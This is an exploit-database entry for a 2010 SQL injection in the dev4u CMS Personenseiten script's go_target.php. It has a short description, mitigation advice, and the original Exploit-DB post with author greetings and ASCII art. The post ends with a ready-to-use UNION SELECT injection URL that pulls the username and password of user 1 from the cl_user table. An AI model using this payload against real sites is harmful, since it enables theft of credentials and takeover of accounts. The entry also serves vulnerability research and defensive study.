header-logo
Suggest Exploit
vendor:
CMS Personenseiten
by:
Easy Laster
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: CMS Personenseiten
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

dev4u CMS (Personenseiten) go_target.php SQL Injection

A SQL injection vulnerability exists in the dev4u CMS Personenseiten script. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable script with a malicious SQL query. This can allow the attacker to gain access to sensitive information such as user credentials.

Mitigation:

Developers should use parameterized queries to prevent SQL injection attacks. Additionally, input validation should be used to ensure that user-supplied data is valid and does not contain malicious code.
Source

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : dev4u CMS (Personenseiten) go_target.php SQL Injection
+Autor : Easy Laster
+Date   : 06.03.2010
+Script  : dev4u CMS Personenseiten
+Download Site : http://www.dev4u.de/cms/personenseiten.php
+Price : 595€
+Language :PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,novaca!ne.

---------------------------------------------------------------------------------------
                                                                                     
 ___ ___ ___ ___                         _ _           _____           _         _   
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_ 
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|  
                                              |___|                 |___|            


----------------------------------------------------------------------------------------
+Vulnerability : www.site.com/dev4u/go_target.php?go_target=texte&kontent_id=999999'

+Exploitable   : www.site.com/dev4u/go_target.php?go_target=texte&kontent_id=9999999'
+union+select+1,2,3,4,5,6,7,8,concat(user_name,0x3a,passwort),10,11,12,13,14,15,16+from+
cl_user+where+user_id=1--+&v=print
-----------------------------------------------------------------------------------------